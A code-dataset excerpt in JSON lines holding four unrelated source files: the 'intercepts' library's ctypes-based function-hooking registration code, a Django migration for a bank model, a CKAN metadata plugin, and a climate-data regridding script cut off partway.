:returns: The intercepted callable.\r\n\r\n Usage::\r\n\r\n >>> import intercepts\r\n >>> increment = lambda x: x + 1\r\n >>> handler = lambda func, arg: arg - (func(arg) - arg)\r\n >>> intercepts.register(increment, handler)\r\n >>> increment(43)\r\n 42\r\n \"\"\"\r\n _register: dict[Type, Callable[[Any, types.FunctionType], Any]] = {\r\n types.BuiltinFunctionType: _register_builtin,\r\n types.FunctionType: _register_function,\r\n types.MethodType: _register_method,\r\n }\r\n obj_type = type(obj)\r\n if obj_type not in _register:\r\n raise NotImplementedError(f\"Unsupported type: {obj_type}\")\r\n _check_intercept(obj, handler)\r\n assert isinstance(handler, types.FunctionType)\r\n return _register[obj_type](obj, handler)\r\n\r\n\r\ndef _register_builtin(\r\n obj: types.BuiltinFunctionType, handler: types.FunctionType\r\n) -> types.BuiltinFunctionType:\r\n obj_addr = get_addr(obj)\r\n _obj_bytes = ctypes.string_at(obj_addr, sys.getsizeof(obj))\r\n _obj = ctypes.cast(\r\n cast(ctypes._SimpleCData, _obj_bytes),\r\n ctypes.py_object,\r\n ).value\r\n\r\n globals_dict = handler.__globals__\r\n _code = replace_load_global(handler.__code__, \"_\", _obj)\r\n _handler = types.FunctionType(\r\n code=_code,\r\n globals=handler.__globals__,\r\n name=handler.__name__,\r\n argdefs=handler.__defaults__,\r\n closure=handler.__closure__,\r\n )\r\n\r\n refs = replace_cfunction(obj, _handler)\r\n _HANDLERS[obj_addr, type(obj)].append(\r\n (refs, (_handler, obj, _obj, handler, globals_dict), _obj_bytes)\r\n )\r\n\r\n # Need to increment reference count of _obj_bytes to avoid segfaults\r\n ctypes.memmove(\r\n get_addr(_obj_bytes),\r\n struct.pack(\r\n \"N\",\r\n struct.unpack(\"N\", ctypes.string_at(get_addr(_obj_bytes), PTR_SIZE))[0] + 1,\r\n ),\r\n PTR_SIZE,\r\n )\r\n\r\n return obj\r\n\r\n\r\ndef _register_function(\r\n obj: types.FunctionType, handler: types.FunctionType\r\n) -> types.FunctionType:\r\n _obj = types.FunctionType(\r\n code=obj.__code__,\r\n globals=obj.__globals__,\r\n name=obj.__name__,\r\n argdefs=obj.__defaults__,\r\n closure=obj.__closure__,\r\n )\r\n obj.__code__ = replace_load_global(handler.__code__, \"_\", _obj)\r\n\r\n _HANDLERS[get_addr(obj), type(obj)].append((obj, _obj))\r\n return obj\r\n\r\n\r\ndef _register_method(\r\n obj: types.MethodType, handler: types.FunctionType\r\n) -> types.MethodType:\r\n _register_function(obj.__func__, handler)\r\n return obj\r\n\r\n\r\ndef unregister(obj: T, depth: int | None = None) -> T:\r\n r\"\"\"Unregisters the handlers for an object.\r\n\r\n :param obj: The callable for which to unregister handlers.\r\n :param depth: (optional) The maximum number of handlers to unregister. 
Defaults to all.\r\n :returns: The previously intercepted callable.\r\n \"\"\"\r\n obj_type = type(obj)\r\n _unregister: dict[Type, Callable] = {\r\n types.BuiltinFunctionType: _unregister_builtin,\r\n types.FunctionType: _unregister_function,\r\n types.MethodType: _unregister_method,\r\n }\r\n if obj_type not in _unregister:\r\n raise NotImplementedError(f\"Unsupported type: {obj_type}\")\r\n _unregister[obj_type](obj, depth=depth)\r\n return obj\r\n\r\n\r\ndef _unregister_builtin_addr(addr: int, depth: int | None = None):\r\n handlers = _HANDLERS[addr, types.BuiltinFunctionType]\r\n if depth is None:\r\n depth = handlers.__len__()\r\n while handlers.__len__() and depth > 0:\r\n depth -= 1\r\n (_, dealloc), *_, _obj_bytes = handlers.pop()\r\n ctypes.memmove(\r\n addr + 2 * PTR_SIZE,\r\n _obj_bytes[2 * PTR_SIZE :],\r\n _obj_bytes.__len__() - 2 * PTR_SIZE,\r\n )\r\n dealloc()\r\n\r\n\r\ndef _unregister_builtin(obj: types.BuiltinFunctionType, depth: int | None = None):\r\n _unregister_builtin_addr(get_addr(obj), depth=depth)\r\n\r\n\r\ndef _unregister_function_addr(addr: int, depth: int | None = None):\r\n handlers = _HANDLERS[addr, types.FunctionType]\r\n if depth is None:\r\n depth = handlers.__len__()\r\n while handlers.__len__() and depth > 0:\r\n depth -= 1\r\n obj, _obj, *_ = handlers.pop()\r\n obj.__code__ = _obj.__code__\r\n\r\n\r\ndef _unregister_function(obj: types.FunctionType, depth: int | None = None):\r\n _unregister_function_addr(get_addr(obj), depth=depth)\r\n\r\n\r\ndef _unregister_method(obj: types.MethodType, depth: int | None = None):\r\n _unregister_function(obj.__func__, depth=depth)\r\n\r\n\r\n@atexit.register\r\ndef unregister_all() -> None:\r\n r\"\"\"Unregisters all handlers.\"\"\"\r\n _unregister: dict[Type, Callable] = {\r\n types.BuiltinFunctionType: _unregister_builtin_addr,\r\n types.FunctionType: _unregister_function_addr,\r\n }\r\n for addr, callable_type in _HANDLERS:\r\n _unregister[callable_type](addr)\r\n _HANDLERS.clear()\r\n","repo_name":"dlshriver/intercepts","sub_path":"intercepts/registration.py","file_name":"registration.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"94"} +{"seq_id":"31817720568","text":"import django.contrib.postgres.fields\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('banks', '0011_auto_20210211_0525'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='bankcard',\n name='bank',\n ),\n migrations.RemoveField(\n model_name='banksubsidiary',\n name='bank',\n ),\n migrations.AlterModelOptions(\n name='bank',\n options={'ordering': ['-updated_at']},\n ),\n migrations.RenameField(\n model_name='bank',\n old_name='banki_url',\n new_name='url_self_banki',\n ),\n migrations.RenameField(\n model_name='bank',\n old_name='cbr_url',\n new_name='url_self_cbr',\n ),\n migrations.AddField(\n model_name='bank',\n name='agencies',\n field=models.JSONField(blank=True, help_text='Представительства', null=True),\n ),\n migrations.AddField(\n model_name='bank',\n name='cards',\n field=models.JSONField(blank=True, help_text='Сведения об эмиссии и эквайринге банковских карт', null=True),\n ),\n migrations.AddField(\n model_name='bank',\n name='subsidiaries',\n field=models.JSONField(blank=True, help_text='Филиалы', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='actual_address',\n field=models.TextField(blank=True, help_text='Адрес фактический'),\n ),\n 
migrations.AlterField(\n model_name='bank',\n name='additional_offices',\n field=models.BigIntegerField(blank=True, help_text='Дополнительные офисы, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='authorized_capital',\n field=models.BigIntegerField(blank=True, help_text='Уставный капитал', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='bank_agencies',\n field=models.BigIntegerField(blank=True, help_text='Представительства, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='bank_subsidiaries',\n field=models.TextField(blank=True, help_text='Филиалы, инфа о кол-ве'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='bik',\n field=models.TextField(blank=True, help_text='БИК'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='deposit_insurance_system',\n field=models.BooleanField(blank=True, help_text='Участие в системе страхования вкладов', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='english_name',\n field=models.TextField(blank=True, help_text='Фирменное наименование на английском языке'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='full_name',\n field=models.TextField(blank=True, help_text='Полное фирменное наименование'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='info_sites',\n field=django.contrib.postgres.fields.ArrayField(base_field=models.URLField(), blank=True, help_text='Информационные сайты и страницы организации в социальных сетях', null=True, size=None),\n ),\n migrations.AlterField(\n model_name='bank',\n name='license_info',\n field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), blank=True, help_text='Лицензия (дата выдачи/последней замены)', null=True, size=None),\n ),\n migrations.AlterField(\n model_name='bank',\n name='license_info_file',\n field=models.URLField(blank=True, help_text='Лицензия файлом'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='mobile_cash_desks',\n field=models.BigIntegerField(blank=True, help_text='Передвижные пункты кассовых операций, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='name',\n field=models.TextField(blank=True, help_text='Сокращённое фирменное наименование'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='ogrn',\n field=models.TextField(blank=True, help_text='Основной государственный регистрационный номер'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='operating_cash_desks',\n field=models.BigIntegerField(blank=True, help_text='Операционные кассы вне кассового узла, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='operating_offices',\n field=models.BigIntegerField(blank=True, help_text='Операционные офисы, количество', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='reg_number',\n field=models.TextField(blank=True, help_text='Регистрационный номер'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='registration_date',\n field=models.DateTimeField(blank=True, help_text='Дата регистрации Банком России', null=True),\n ),\n migrations.AlterField(\n model_name='bank',\n name='statutory_address',\n field=models.TextField(blank=True, help_text='Адрес из устава'),\n ),\n migrations.AlterField(\n model_name='bank',\n name='tel_number',\n field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), blank=True, help_text='Телефон', null=True, size=None),\n ),\n migrations.DeleteModel(\n 
name='BankAgency',\n ),\n migrations.DeleteModel(\n name='BankCard',\n ),\n migrations.DeleteModel(\n name='BankSubsidiary',\n ),\n ]\n","repo_name":"brlabrussia/ml-info","sub_path":"app/banks/migrations/0012_auto_20210221_0512.py","file_name":"0012_auto_20210221_0512.py","file_ext":"py","file_size_in_byte":6836,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17115719247","text":"#!/usr/bin/env python\n# encoding: utf-8\nimport json\nimport ckan.plugins as p\nimport ckanext.stcndm.logic.common as common\nimport ckanext.stcndm.logic.cubes as cubes\nimport ckanext.stcndm.logic.daily as daily\nimport ckanext.stcndm.logic.legacy as legacy\nimport ckanext.stcndm.logic.releases as releases\nimport ckanext.stcndm.logic.subjects as subjects\nimport ckanext.stcndm.logic.views as views\nimport ckanext.stcndm.logic.surveys as surveys\nfrom dateutil.parser import parse\nfrom datetime import datetime\n\nfrom ckan.lib.navl.dictization_functions import _\nfrom ckan.logic import ValidationError\nfrom ckanext.stcndm import validators\nfrom ckanext.stcndm import helpers\nfrom ckanext.scheming.helpers import (\n scheming_language_text,\n scheming_get_dataset_schema\n)\nfrom helpers import lookup_label, is_dguid\nimport unicodedata\nfrom ckanext.stcndm.model import geo\n\ndef strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s)\n if unicodedata.category(c) != 'Mn')\n\n\n# noinspection PyMethodMayBeStatic\nclass STCNDMPlugin(p.SingletonPlugin):\n p.implements(p.IActions)\n p.implements(p.IConfigurer)\n p.implements(p.IPackageController, inherit=True)\n p.implements(p.IValidators)\n p.implements(p.ITemplateHelpers)\n p.implements(p.IPackageController)\n p.implements(p.IRoutes)\n p.implements(p.IFacets)\n\n def update_config(self, config):\n \"\"\"\n Add configuration we need during startup\n \"\"\"\n p.toolkit.add_template_directory(config, \"templates\")\n p.toolkit.add_public_directory(config, 'public')\n\n config.update({\n # TODO: We can probably just make this dynamic? 
Are there\n # schemas that should *not* be imported other than presets?\n 'scheming.dataset_schemas': '\\n'.join([\n 'ckanext.stcndm:schemas/article.yaml',\n 'ckanext.stcndm:schemas/chart.yaml',\n 'ckanext.stcndm:schemas/codeset.yaml',\n 'ckanext.stcndm:schemas/conference.yaml',\n 'ckanext.stcndm:schemas/correction.yaml',\n 'ckanext.stcndm:schemas/cube.yaml',\n 'ckanext.stcndm:schemas/daily.yaml',\n 'ckanext.stcndm:schemas/dataset.yaml',\n 'ckanext.stcndm:schemas/format.yaml',\n 'ckanext.stcndm:schemas/generic.yaml',\n 'ckanext.stcndm:schemas/geodescriptor.yaml',\n 'ckanext.stcndm:schemas/indicator.yaml',\n 'ckanext.stcndm:schemas/issue.yaml',\n 'ckanext.stcndm:schemas/keyword.yaml',\n 'ckanext.stcndm:schemas/map.yaml',\n 'ckanext.stcndm:schemas/province.yaml',\n 'ckanext.stcndm:schemas/publication.yaml',\n 'ckanext.stcndm:schemas/pumf.yaml',\n 'ckanext.stcndm:schemas/service.yaml',\n 'ckanext.stcndm:schemas/subject.yaml',\n 'ckanext.stcndm:schemas/survey.yaml',\n 'ckanext.stcndm:schemas/video.yaml',\n 'ckanext.stcndm:schemas/view.yaml'\n ]),\n 'scheming.presets': '\\n'.join([\n 'ckanext.scheming:presets.json',\n 'ckanext.repeating:presets.json',\n 'ckanext.fluent:presets.json',\n 'ckanext.stcndm:schemas/presets.yaml'\n ]),\n 'ckan.search.show_all_types': 'true',\n 'search.query_fields': 'product_id_new^8 name^4 '\n 'title_{{LANG}}^4 text',\n 'search.tie': '0.0',\n 'search.sort': 'score desc, product_id_new_sort asc',\n })\n\n from ckanext.stcndm.model.geo import setup\n setup()\n\n def before_index(self, data_dict):\n \"\"\"\n customize data sent to solr\n\n :param data_dict:\n :type data_dict dict\n\n :returns dict\n \"\"\"\n dataset_schema = scheming_get_dataset_schema(data_dict.get('type'))\n if dataset_schema is None:\n raise ValidationError((_(\n 'Found no schema for following datasets:\\n{dump}'.format(\n dump=json.dumps(data_dict, indent=2, sort_keys=True)\n )\n ),))\n\n field_schema = dict(\n (s['field_name'], s) for s in dataset_schema['dataset_fields']\n )\n\n index_data_dict = data_dict.copy()\n for k in data_dict:\n if k.startswith(u'extras_'):\n index_data_dict.pop(k, None)\n\n authors = []\n default_date = datetime(1, 1, 1, 8, 30, 0, 0)\n\n validated_data_dict = json.loads(data_dict['validated_data_dict'])\n\n name = validated_data_dict.get(u'name')\n\n # append dguids from the datastore\n if validated_data_dict.get(u'product_id_new'):\n index_data_dict[u'dguid_codes'] = []\n for dguid_pkg_id in geo.get_geodescriptors_for_package(\n validated_data_dict[u'product_id_new']):\n index_data_dict[u'dguid_codes'].append(\n helpers.get_dguid_from_pkg_id(dguid_pkg_id))\n # strip the vintages from dguids to get geodescriptors\n index_data_dict[u'geodescriptor_codes'] = \\\n [g[4:] if is_dguid(g) else g\n for g in index_data_dict[u'dguid_codes'] if g]\n\n for item, value in validated_data_dict.iteritems():\n fs = field_schema.get(item)\n\n # Do not index any field that is not currently in the schema.\n if not fs:\n continue\n\n field_type = fs.get('schema_field_type', 'string')\n # TODO: we're not using the multivalued schema field. Drop it?\n multivalued = fs.get('schema_multivalued', False)\n\n # Legacy issues numbers are non-numeric, which is problematic\n # for sorting and external tools. 
We can't just use a Solr\n # directive, as it'll fail entirely on a bad value.\n if name == 'issue_number':\n if value.isdigit():\n index_data_dict['issue_number_int'] = int(value)\n\n # Fluent (multilingual) fields are really dictionaries, where\n # each key is the ISO language code, and the value the translated\n # text. We need to unpack these into individual solr fields\n # for per-language search.\n if field_type == 'fluent':\n if isinstance(value, dict):\n index_data_dict.update(\n (u'{0}_{1}'.format(item, k), v)\n for k, v in value.iteritems()\n )\n else:\n raise ValidationError((_(\n '{name}: Expecting a fluent dict for {item}, '\n 'instead got {value!r}'.format(\n name=name,\n item=item,\n value=value\n )\n ), ))\n\n # Numeric foreign keys that need to be looked up to retrieve\n # their multilingual labels for searching.\n elif field_type == u'code':\n index_data_dict[unicode(item)] = value\n\n # These codes can refer to a codeset (a dataset of type\n # 'codeset' with a particular key), a preset (a hardcoded\n # value in a Scheming schema), or another dataset (lookup).\n lookup_type = fs.get(u'lookup', '')\n if lookup_type == u'codeset':\n lookup = fs.get(u'codeset_type', '')\n elif lookup_type == u'preset':\n lookup = fs.get(u'preset', '')[4:]\n else:\n lookup = fs.get(u'lookup', '')\n\n if not lookup:\n raise ValidationError((_(\n '{name}: unable to determine lookup '\n 'for {item}'.format(\n name=name,\n item=item\n )\n ), ))\n\n if isinstance(value, list):\n for value_to_lookup in value:\n if not value_to_lookup:\n continue\n\n desc = lookup_label(\n lookup,\n value_to_lookup,\n lookup_type\n )\n\n for k, v in desc.iteritems():\n if v and not k == u'found':\n n = u'{item}_desc_{key}'.format(\n item=item,\n key=k\n )\n index_data_dict.update(\n {n: index_data_dict.get(n, []) + [v]}\n )\n\n else:\n desc = lookup_label(lookup, value, lookup_type)\n\n index_data_dict.update((\n u'{item}_desc_{key}'.format(\n item=item,\n key=k\n ), v)\n for k, v in desc.iteritems() if v and not k == u'found'\n )\n if item == u'geodescriptor_codes':\n index_data_dict[u'dguid_codes'] = \\\n list(index_data_dict[u'geodescriptor_codes'])\n elif field_type == 'date':\n try:\n date = parse(value, default=default_date)\n index_data_dict[unicode(item)] = unicode(\n date.isoformat()[:19] + u'Z'\n )\n except ValueError:\n continue\n elif item.endswith('_authors'):\n index_data_dict[unicode(item)] = value\n authors.extend(value)\n else:\n index_data_dict[unicode(item)] = value\n\n if authors:\n index_data_dict['authors'] = authors\n index_data_dict['authors_initials'] = list(\n set(\n [strip_accents(i[0]).upper() for i in authors]\n )\n )\n\n return index_data_dict\n\n def after_create(self, context, data):\n if 'model' in context:\n # We need to force a commit to get the metadata_modified\n # and metadata_created columns. It is *not* enough for us to\n # simply set these ourselves. 
This is caused by after_create\n # being called long before creation is actually complete.\n context['model'].repo.commit()\n\n if context.get('__cloning'):\n # We don't want to call this while we're cloning, or we'll\n # end up with duplicate release records.\n return\n\n product_id_new = data.get('product_id_new')\n if data['type'] == 'format':\n product_id_new = data.get('format_id')\n\n if not product_id_new:\n return\n\n helpers.ensure_release_exists(product_id_new, context=context)\n\n def get_actions(self):\n # Some Java web clients require the web service to use Pascal Case\n return {\n \"GetAutocomplete\": common.get_autocomplete,\n \"GetInternalAuthors\": common.get_internal_authors,\n \"DeleteProduct\": common.delete_product,\n \"EnsureReleaseExists\": releases.ensure_release_exists,\n \"GetBookableProducts\": daily.get_bookable_releases,\n \"GetCubeList\": cubes.get_cube_list_by_subject,\n \"GetCube\": cubes.get_cube,\n \"UpdateCube\": cubes.update_cube,\n \"GetNextCubeId\": cubes.get_next_cube_id,\n \"GetNextNonDataProductId\": common.get_next_non_data_product_id,\n \"CreateOrUpdateCubeRelease\": cubes.create_or_update_cube_release,\n \"GetThemes\": daily.get_themes,\n \"GetDailyList\": daily.get_daily_list,\n \"GetDefaultViews\": daily.get_default_views,\n \"GetDerivedProductList\": common.get_derived_product_list,\n \"GetFormatDescription\": common.get_format_description,\n \"GetLastPublishStatus\": common.get_last_publish_status,\n \"GetNextProductId\": common.get_next_product_id,\n \"GetNextLegacyArticleId\": legacy.get_next_legacy_article_id,\n \"GetNextLegacyProductId\": legacy.get_next_legacy_product_id,\n \"GetProduct\": common.get_product,\n \"GetProductIssueArticles\": daily.get_product_issue_articles,\n \"GetProductIssues\": daily.get_product_issues,\n \"GetProductType\": common.get_product_type,\n \"GetReleasesForProduct\": releases.get_releases_for_product,\n \"GetSubject\": subjects.get_subject,\n \"GetSubjectList\": subjects.get_top_level_subject_list,\n \"GetSurveySubjectCodes\": surveys.get_survey_subject_codes,\n \"GetUpcomingReleases\": common.get_upcoming_releases,\n \"GetIssuesByPubStatus\": common.get_issues_by_pub_status,\n \"GetProductFormats\": daily.get_product_formats,\n \"GetProductUrl\": common.get_product_url,\n \"GetProductsBySurvey\": surveys.get_products_by_survey,\n \"PurgeDataset\": common.purge_dataset,\n \"RegisterCube\": cubes.register_cube,\n \"RegisterDaily\": daily.register_daily,\n \"RegisterDataProduct\": common.register_data_product,\n \"RegisterNonDataProduct\": common.register_non_data_product,\n \"RegisterLegacyNonDataProduct\":\n legacy.register_legacy_non_data_product,\n \"RegisterProduct\": common.register_data_product,\n \"RegisterSurvey\": surveys.register_survey,\n \"UpdateDefaultView\": views.update_default_view,\n \"UpdateReleaseDateAndStatus\":\n common.update_release_date_and_status,\n \"UpdateProductGeo\": common.update_product_geo,\n \"UpdatePublishingStatus\": common.update_last_publish_status,\n \"GetDatasetSchema\": common.get_dataset_schema,\n \"GetGroupSchema\": common.get_group_schema,\n \"GetSurveyCodesets\": surveys.get_survey_codesets,\n \"GetSubjectCodesets\": subjects.get_subject_codesets,\n \"GetProductsByFRC\": daily.get_products_by_frc,\n \"ConsumeTransactionFile\": releases.consume_transaction_file\n }\n\n def get_validators(self):\n return {\n \"apply_archive_rules\": validators.apply_archive_rules,\n \"archive_children_of_cube\": validators.archive_children_of_cube,\n \"codeset_create_name\": 
validators.codeset_create_name,\n \"codeset_multiple_choice\": validators.codeset_multiple_choice,\n \"correction_create_name\": validators.correction_create_name,\n \"create_product_id\": validators.create_product_id,\n \"daily_create_name\": validators.daily_create_name,\n \"set_default_value\": validators.set_default_value,\n \"format_create_name\": validators.format_create_name,\n \"format_create_id\": validators.format_create_id,\n \"geodescriptor_create_name\": validators.geodescriptor_create_name,\n \"keyword_create_name\": validators.keyword_create_name,\n \"ndm_str2boolean\": validators.ndm_str2boolean,\n \"ndm_tag_name_validator\": validators.ndm_tag_name_validator,\n \"ndm_child_inherits_value\": validators.ndm_child_inherits_value,\n \"province_create_name\": validators.province_create_name,\n \"product_create_name\": validators.product_create_name,\n \"shortcode_validate\": validators.shortcode_validate,\n \"shortcode_output\": validators.shortcode_output,\n \"subject_create_name\": validators.subject_create_name,\n \"survey_create_name\": validators.survey_create_name,\n \"repeating_text_delimited\": validators.repeating_text_delimited,\n }\n\n def get_helpers(self):\n return {\n \"codeset_choices\": helpers.codeset_choices,\n \"lookup_label\": helpers.lookup_label,\n \"get_dataset_types\": helpers.get_dataset_types,\n \"get_parent_content_types\": helpers.get_parent_content_types,\n \"set_previous_issue_archive_date\":\n helpers.set_previous_issue_archive_date,\n 'ensure_release_exists': helpers.ensure_release_exists,\n 'get_parent_dataset': helpers.get_parent_dataset,\n 'get_child_datasets': helpers.get_child_datasets,\n 'x2list': helpers.x2list,\n 'set_related_id': helpers.set_related_id,\n 'changes_since': helpers.changes_since,\n 'get_geolevel': helpers.get_geolevel,\n 'get_dguid_from_pkg_id': helpers.get_dguid_from_pkg_id,\n }\n\n def before_view(self, pkg_dict):\n \"\"\"\n Ensure that (if available) the correct language strings\n are used for core CKAN fields.\n \"\"\"\n fields_to_fluent = (\n u'title',\n u'notes'\n )\n\n for field in fields_to_fluent:\n if field in pkg_dict and isinstance(pkg_dict[field], dict):\n pkg_dict[field] = scheming_language_text(pkg_dict[field])\n\n return pkg_dict\n\n def before_map(self, map):\n map.connect(\n 'clone',\n '/dataset/clone/{ds_id}',\n controller=(\n 'ckanext.stcndm.controllers.clone'\n ':CloneDatasetController'\n ),\n action='clone'\n )\n\n map.connect(\n 'child_dataset',\n '/dataset/{ds_id}/child/{ds_type}/new',\n controller=(\n 'ckanext.stcndm.controllers.child_dataset'\n ':ChildDatasetController'\n ),\n action='new'\n )\n\n map.connect(\n 'solr_proxy',\n '/solr/select',\n controller=(\n 'ckanext.stcndm.controllers.solr_proxy'\n ':SolrProxyController'\n ),\n action='select'\n )\n\n map.connect(\n 'schema_to_xl',\n '/schema_to_xl/dump',\n controller=(\n 'ckanext.stcndm.controllers.schema_to_xl'\n ':SchemaToXlController'\n ),\n action='dump'\n )\n\n return map\n\n def after_map(self, map):\n # Required since we implement IRoutes.\n return map\n\n def dataset_facets(self, facets_dict, package_type):\n return facets_dict\n\n def organization_facets(self, facets_dict, organization_type,\n package_type):\n # We always want the dataset type selector to appear.\n # Currently, groups, organizations, licence type, etc... 
do not\n # apply to ndm, so lets clear the default fields as well.\n facets_dict.clear()\n facets_dict['dataset_type'] = _('Dataset Type')\n return facets_dict\n\n def group_facets(self, facets_dict, group_type, package_type):\n return facets_dict\n","repo_name":"open-data/ckanext-stcndm","sub_path":"ckanext/stcndm/plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":19146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"25756921999","text":"import xarray as xr\nimport xesmf as xe\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy\nimport statsmodels.api as sm\nimport cartopy\nimport cartopy.crs as ccrs\nimport glob\nimport sys\nimport datetime\n\ndirERA5Land = '/home/edcoffel/drive/MAX-Filer/Research/Climate-02/Data-02-edcoffel-F20/ERA5-Land'\ndirERA5 = '/home/edcoffel/drive/MAX-Filer/Research/Climate-02/Data-02-edcoffel-F20/ERA5'\ndirSacks = '/home/edcoffel/drive/MAX-Filer/Research/Climate-01/Personal-F20/edcoffel-F20/data/projects/ag-land-climate'\n\nfile_var1 = 'lai_low'\nfile_var2 = 'lai_high'\norig_var1 = 'lai_lv'\norig_var2 = 'lai_hv'\ncrop = 'Maize'\n\nyear = int(sys.argv[1])\n\nlatRange = [-90, 90]\nlonRange = [0, 360]\n\n\n# LOADING SACKS CROP CALENDARS\nsacksMaizeNc = xr.open_dataset('%s/sacks/%s.crop.calendar.fill.nc'%(dirSacks, crop))\nsacksStart = sacksMaizeNc['plant'].values\nsacksStart = np.roll(sacksStart, -int(sacksStart.shape[1]/2), axis=1)\nsacksStart[sacksStart < 0] = np.nan\nsacksEnd = sacksMaizeNc['harvest'].values\nsacksEnd = np.roll(sacksEnd, -int(sacksEnd.shape[1]/2), axis=1)\nsacksEnd[sacksEnd < 0] = np.nan\n\n# THESE ARE THE LAT/LON GRIDS THAT SACKS IS ON\nsacksLat = np.linspace(90, -90, 360)\nsacksLon = np.linspace(0, 360, 720)\n\nregridMesh_cur_model = xr.Dataset()\n\n# regrid sacks data to current model res\nregridMesh_cur_model = xr.Dataset({'lat': (['lat'], sacksLat),\n 'lon': (['lon'], sacksLon)})\n\nn = 0\n\n# load low vegetaion cover\nera5_low_veg = xr.open_dataset('%s/monthly/low_vegetation_cover.nc'%dirERA5)\n\nera5_low_veg = era5_low_veg.rename_dims(latitude='lat', longitude='lon')\nera5_low_veg = era5_low_veg.rename({'latitude':'lat', 'longitude':'lon'})\n\nera5_low_veg = era5_low_veg.isel(time=0,expver=0)\nera5_low_veg.load()\n\nera5_low_veg = era5_low_veg.drop('expver')\nera5_low_veg = era5_low_veg.drop('time')\n\nregridder_low_veg = xe.Regridder(xr.DataArray(data=era5_low_veg.cvl, dims=['lat', 'lon'], coords={'lat':era5_low_veg.lat, 'lon':era5_low_veg.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nera5_low_veg = regridder_low_veg(era5_low_veg)\n\n# and load high veg cover\nera5_high_veg = xr.open_dataset('%s/monthly/high_vegetation_cover.nc'%dirERA5)\n\nera5_high_veg = era5_high_veg.rename_dims(latitude='lat', longitude='lon')\nera5_high_veg = era5_high_veg.rename({'latitude':'lat', 'longitude':'lon'})\n\nera5_high_veg = era5_high_veg.isel(time=0,expver=0)\nera5_high_veg.load()\n\nera5_high_veg = era5_high_veg.drop('expver')\nera5_high_veg = era5_high_veg.drop('time')\n\nregridder_high_veg = xe.Regridder(xr.DataArray(data=era5_high_veg.cvh, dims=['lat', 'lon'], coords={'lat':era5_high_veg.lat, 'lon':era5_high_veg.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nera5_high_veg = regridder_high_veg(era5_high_veg)\n\n\n# LOAD 1 YEAR OF ERA5 DATA\nprint('opening era5 %d...'%year)\nlai_low_era5 = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var1, year))\nlai_low_era5.load()\n\nlai_high_era5 = 
xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var2, year))\nlai_high_era5.load()\n\nprint('opening era5 %d...'%(year-1))\nlai_low_era5_last_year = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var1, year-1))\nlai_low_era5_last_year.load()\n\nlai_high_era5_last_year = xr.open_dataset('%s/monthly/%s_%d.nc'%(dirERA5Land, file_var2, year-1))\nlai_high_era5_last_year.load()\n\nlai_low_era5 = lai_low_era5.rename_dims(latitude='lat', longitude='lon')\nlai_low_era5 = lai_low_era5.rename({'latitude':'lat', 'longitude':'lon'})\n\nlai_high_era5 = lai_high_era5.rename_dims(latitude='lat', longitude='lon')\nlai_high_era5 = lai_high_era5.rename({'latitude':'lat', 'longitude':'lon'})\n\nlai_low_era5_last_year = lai_low_era5_last_year.rename_dims(latitude='lat', longitude='lon')\nlai_low_era5_last_year = lai_low_era5_last_year.rename({'latitude':'lat', 'longitude':'lon'})\n\nlai_high_era5_last_year = lai_high_era5_last_year.rename_dims(latitude='lat', longitude='lon')\nlai_high_era5_last_year = lai_high_era5_last_year.rename({'latitude':'lat', 'longitude':'lon'})\n\n# THIS USES XESMF TO REGRID THE SACKS DATA TO ERA5 RES\n\n\nregridder_lai_low = xe.Regridder(xr.DataArray(data=lai_low_era5[orig_var1], dims=['time', 'lat', 'lon'], coords={'lat':lai_low_era5.lat, 'lon':lai_low_era5.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nregridder_lai_high = xe.Regridder(xr.DataArray(data=lai_high_era5[orig_var2], dims=['time', 'lat', 'lon'], coords={'lat':lai_high_era5.lat, 'lon':lai_high_era5.lon}), regridMesh_cur_model, 'bilinear', reuse_weights=True)\nregridder_lai_low_last_year = xe.Regridder(xr.DataArray(data=lai_low_era5_last_year[orig_var1], dims=['time', 'lat', 'lon'], coords={'lat':lai_low_era5_last_year.lat, 'lon':lai_low_era5_last_year.lon}), \\\n regridMesh_cur_model, 'bilinear', reuse_weights=True)\nregridder_lai_high_last_year = xe.Regridder(xr.DataArray(data=lai_high_era5_last_year[orig_var2], dims=['time', 'lat', 'lon'], coords={'lat':lai_high_era5_last_year.lat, 'lon':lai_high_era5_last_year.lon}), \\\n regridMesh_cur_model, 'bilinear', reuse_weights=True)\n\nlai_low_era5 = regridder_lai_low(lai_low_era5)\nlai_high_era5 = regridder_lai_high(lai_high_era5)\nlai_low_era5_last_year = regridder_lai_low_last_year(lai_low_era5_last_year)\nlai_high_era5_last_year = regridder_lai_high_last_year(lai_high_era5_last_year)\n\n# count up all non-nan grid cells so 